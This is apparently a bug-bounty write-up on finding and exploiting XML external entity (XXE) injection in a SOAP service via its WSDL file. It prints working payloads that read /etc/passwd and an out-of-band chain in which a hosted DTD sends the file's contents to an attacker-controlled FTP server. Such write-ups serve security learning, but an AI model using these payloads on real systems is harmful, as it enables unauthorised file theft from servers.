I omitted the application name as it was private program.

While registering for an application, i have got wsdl file such as:

https://victim.com/services/ApiService?wsdl

I have used wsdler burp extension to parse the wsdl file as shown in below image:

Now, I sent a request to repeater and started fuzzing it for XXE. Firstly, i have started with Classic XXE payloads such as:

<?xml version=”1.0"?><!DOCTYPE data [<!ELEMENT data (#ANY)><!ENTITY file SYSTEM “file:///etc/passwd”>]><data>&file;</data>

As you can see, from above two responses we can confirm the existence of vulnerability, but we can only enumerate file from server.

In order to extract the content of file, we need to emulate FTP-server (or if you had used a different one, please comment:)

I setup an xxe.dtd file on my server with following payload:

<!ENTITY % d SYSTEM “file:///etc/passwd”><!ENTITY % c “<!ENTITY rrr SYSTEM ‘ftp://x.x.x.x:2121/%d;'>">

Download and run the emulated ftp server from following link(Make sure about Port to listen):

Now, we need to enter the following XXE payload in vulnerable request such as:

<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x/xxe.dtd"> %asd; %c;]> <sessionId>&rrr;</sessionId>

As soon as you run the vulnerable request, you will start receiving content of /etc/passwd file on emulated FTP server as shown in below screenshot: